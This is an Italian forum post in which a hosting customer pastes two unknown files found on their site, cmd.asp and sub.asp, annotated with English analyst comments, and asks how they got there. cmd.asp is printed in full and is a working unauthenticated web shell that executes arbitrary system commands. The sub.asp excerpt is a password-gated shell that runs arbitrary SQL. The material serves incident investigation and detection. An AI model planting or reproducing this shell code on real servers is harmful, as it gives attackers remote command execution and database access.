Ciao a tutti, sul mio spazio FTP di un sito registrato con xxxxx mi trovo due file, cmd.asp e sub.asp (che io non ho mai uploadato).
Il contenuto dei file è:
cmd.asp
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
' Analyst notes on cmd.asp as posted: a single-page web shell. It runs whatever
' arrives in the request parameter "c" on the server and prints the command's
' standard output inside a read-only textarea, followed by a form to submit the
' next command.
' - The two <object> tags above create the same id (oScriptlhn) from two class
'   IDs; the second is only emitted when err is set after the first. Both are
'   class IDs of the Windows Script Host shell object (WScript.Shell), which
'   matches the .exec(...).stdout.readall call below.
' - Because the object is referenced by class ID, the ProgID text never appears
'   in the file. A content scan that looks only for "WScript.Shell" misses it;
'   searching the web root for these clsid values is the more reliable check.
' - No password, session or caller check appears anywhere in this file.
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
' The executable path is c:\recycler\cmd.exe, not the system directory. Whether
' a cmd.exe copy exists at that path is worth checking on the host.
' request("c") names no collection, so ASP looks in QueryString before Form. A
' command sent by GET therefore shows up in the web server log's query field,
' while one sent by the POST form below is not in the default log fields.
response.write oScriptlhn.exec("c:\recycler\cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
' NOTE(review): the next string literal is split across two lines as posted,
' presumably a line break introduced by the forum rendering. Left as found.
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='run'></form>")
%>
sub.asp (ne riporto solo una parte: il file intero occupa 40 KB)
<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat="server" id="sa" scope="page" classid="clsid:13709620-C279-11CE-A49E-444553540000"></object>
<%
' Analyst notes on the opening of sub.asp as posted: configuration and request
' parsing for a larger password-gated management page. The poster elided most
' of the 40 KB file, so only what is visible here is described.
' - "ws" is declared twice with the same two class IDs used in cmd.asp (Windows
'   Script Host shell object). "sa" uses the class ID of Shell.Application.
'   NOTE(review): in cmd.asp the second declaration sits behind "if err"; here
'   both appear unconditionally, which may be a loss in the paste.
' - These clsid strings and the UserPass value below are usable as search
'   indicators for other copies of the file on the hosting space.
Server.ScriptTimeout=5000
Response.Buffer = True
' From here on runtime errors are suppressed, not reported.
On Error Resume Next
ApplicationName = "Wellcome"
' Encoded form of the access password. It is compared against MyEncode(input)
' in the login check further down. MyEncode is not shown; ALL_INIT below is the
' Base64 alphabet, so this is presumably an encoding, not a hash. TODO confirm.
UserPass = "a2luZ3NoaQ=="
' NOTE(review): "Flase" is not a keyword. Unless Option Explicit is set
' (not visible), it is read as an uninitialised variable.
ShowFileIco = Flase
IcoPath = ""
' Both empty as posted. They are used in the login section as a request
' parameter name and its expected value.
logintype0 = ""
logintype1 = ""
' Request(...) without a collection reads from the query string or the form,
' so these action and path parameters can appear in access-log query fields.
theAct = Request("theAct")
thePath = Request("thePath")
URL = Request.ServerVariables("URL")
ServerURL = Request.ServerVariables("HTTP_HOST")
' The server's local address. It is written into the page <title> later on.
ServerIP = Request.ServerVariables("LOCAL_ADDR")
Action = Request("Action")
RootPath = Server.MapPath(".")
WWWRoot = Server.MapPath("/")
FolderPath = Request("FolderPath")
FName = Request("FName")
' NOTE(review): the stray spaces inside the next two constants ("uv wxyz",
' "co nfig", "as a") look like forum line-wrap artifacts, not original text.
Const ALL_INIT ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv wxyz0123456789+/"
Const editableFileExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$co nfig$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$as a$"
BackUrl = "<meta http-equiv='refresh' content='1;URL=?Action=ShowFile'>"
dim EncodeGroup(63)
Dim SearchGroup(127)
Call initCodecs
' This branch runs before the login check: any request carrying a non-empty
' "makepwd" parameter gets the encoded form of that value back and the page
' ends. Requests containing "makepwd=" are a recognisable trace in the logs.
If Request("makepwd")<>"" Then
echo "Your Encode PassWord is: "&MyEncode(Request("makepwd"))
Response.End()
End If
' Login gate. The session is treated as authenticated when Session("KKK")
' holds the same encoded string as UserPass. Everything after this block runs
' only for an authenticated session, because the unauthenticated path always
' reaches Response.End.
If Session("KKK")<>UserPass Then
If Request.Form("LPass")<>"" Then
' Password submitted: encode it and compare with the stored value.
If MyEncode(Request.Form("LPass"))=UserPass Then
Session("KKK")=UserPass
' On success the browser is sent back to whatever the Referer header contains.
Response.Redirect Request.ServerVariables("HTTP_REFERER")
Else
echo"Failed"
End If
Else
' No password submitted. The login form is shown only when the request
' parameter named by logintype0 equals logintype1; otherwise the response is
' just a script that closes the window.
' NOTE(review): both variables are empty strings as posted, so presumably the
' form is always shown in this copy. Confirm the behaviour of Request("").
If Request(logintype0)<>logintype1 then
echo "<script>window.close();</script>"
Else
' NOTE(review): the literal below is split across two lines as posted, likely
' a forum rendering artifact.
Sl="<center>
"
Sl=Sl&"<form action='"&URL&"' method='post'>"
' The label and button text are not ASCII. The page declares charset=gb2312
' further down, so the garbled characters are presumably GB2312 text shown in
' the wrong encoding. The password field name "LPass" is the stable marker.
Sl=Sl&"ÄÇÒ»½£µÄ·çÇé:<input name='LPass' type='password' size='16'>"
Sl=Sl&"<input type='submit' value='»¶Ó_Äú'></form></center>"
echo Sl
End If
End If
Response.End
End If
' Thin wrapper used throughout the file to write a string to the response.
Sub echo(str)
Response.Write(str)
End Sub
[...]
' Analyst notes: tail of a database module. The enclosing function's header
' was elided by the poster, and DbStr, SqlStr, ObT and HTMLEncode are defined
' outside the visible text. What the visible lines do:
'   1. open a connection with the connection string DbStr,
'   2. list the tables of that database,
'   3. run SqlStr: statements starting with "select" are displayed as a paged
'      grid, anything else is passed to Conn.Execute unchanged.
' For incident response, the database that the connection string pointed at
' could be both read and modified through this page.
If Len(DbStr)>40 Then
' ObT(5,0) is a lookup not shown here; presumably it yields the ProgID of an
' ADO connection object, given the Open/OpenSchema/Execute calls that follow.
Set Conn=CreateObject(ObT(5,0))
Conn.Open DbStr
' 20 is the ADO adSchemaTables constant; the loop below keeps rows whose
' TABLE_TYPE is "TABLE" and reads their TABLE_NAME.
Set Rs=Conn.OpenSchema(20)
Sl=Sl&"<table><tr height='25' Bgcolor='#CCCCCC'><td>Table
Name</td>"
Rs.MoveFirst
Do While Not Rs.Eof
If Rs("TABLE_TYPE")="TABLE" then
TName=Rs("TABLE_NAME")
' NOTE(review): the literal below is split across two lines as posted and the
' link markup around "[ del ]" appears to have been stripped by the forum.
Sl=Sl&"<td align=center>[ del ]
"
Sl=Sl&""&TName&"</td>"
End If
Rs.MoveNext
Loop
Set Rs=Nothing
Sl=Sl&"</tr></table>"
echo Sl:Sl=""
If Len(SqlStr)>10 Then
' Read path: only a case-insensitive "select" prefix selects this branch.
If LCase(Left(SqlStr,6))="select" then
Sl=Sl&"Ö´ÐÐÓï¾ä£º"&SqlStr
Set Rs=CreateObject("Adodb.Recordset")
Rs.open SqlStr,Conn,1,1
FN=Rs.Fields.Count
RC=Rs.RecordCount
' Results are paged 500 rows at a time; the page number comes from the
' "Page" request parameter and is clamped to 1..PageCount.
Rs.PageSize=500
Count=Rs.PageSize
PN=Rs.PageCount
Page=request("Page")
If Page<>"" Then Page=Clng(Page)
If Page="" Or Page=0 Then Page=1
If Page>PN Then Page=PN
If Page>1 Then Rs.absolutepage=Page
Sl=Sl&"<table><tr height=25 bgcolor=#cccccc><td></td>"
' Header row: one cell per column name.
For n=0 to FN-1
Set Fld=Rs.Fields.Item(n)
Sl=Sl&"<td align='center'>"&Fld.Name&"</td>"
Set Fld=nothing
Next
Sl=Sl&"</tr>"
Do While Not(Rs.Eof or Rs.Bof) And Count>0
Count=Count-1
Bgcolor="#EFEFEF"
Sl=Sl&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"
For i=0 To FN-1
If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
' A single-record result is shown in full; otherwise each value is cut to
' its first 50 characters before display.
If RC=1 Then
ColInfo=HTMLEncode(Rs(i))
Else
ColInfo=HTMLEncode(Left(Rs(i),50))
End If
Sl=Sl&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
Next
Sl=Sl&"</tr>"
Rs.MoveNext
Loop
echo Sl:Sl=""
SqlStr=HtmlEnCode(SqlStr)
Sl=Sl&"<tr><td colspan="&FN+1&" align=center>Record Count£º"&RC&"Page£º"&Page&"/"&PN
' Pager. NOTE(review): the anchor markup in these literals appears to have
' been stripped by the forum, leaving only the link text.
If PN>1 Then
Sl=Sl&"HomePrevious"
If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
For i=Sp To Sp+8
If i>PN Then Exit For
If i=Page Then
Sl=Sl&i&""
Else
Sl=Sl&""&i&""
End If
Next
Sl=Sl&"NextLast"
End If
Sl=Sl&"<hr color='#EFEFEF'></td></tr></table>"
Rs.Close:Set Rs=Nothing
echo Sl:Sl=""
Else
' Write path: any statement that does not start with "select" is executed
' as given, with no restriction visible in this fragment.
Conn.Execute(SqlStr)
Sl=Sl&"SQLÓï¾ä£º"&SqlStr
End If
echo Sl:Sl=""
End If
Conn.Close
Set Conn=Nothing
End If
End Function
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=ApplicationName&"-"&ServerIP&"-"%></title>
<style type="text/css">
<!--
body,td {font-size: 12px;}
input,select{font-size: 12px;background-color:#FFFFFF;}
.tr {background-color:#EFEFEF;}
.cmd {background-color:#000000;color:#FFFFFF}
body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;
<%If Action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}
a {color: black;text-decoration: none;}
.am {color: #003366;font-size: 11px;}
-->
</style>
[...]
Immagino che sia un virus, ma come ci è arrivato sullo spazio hosting?

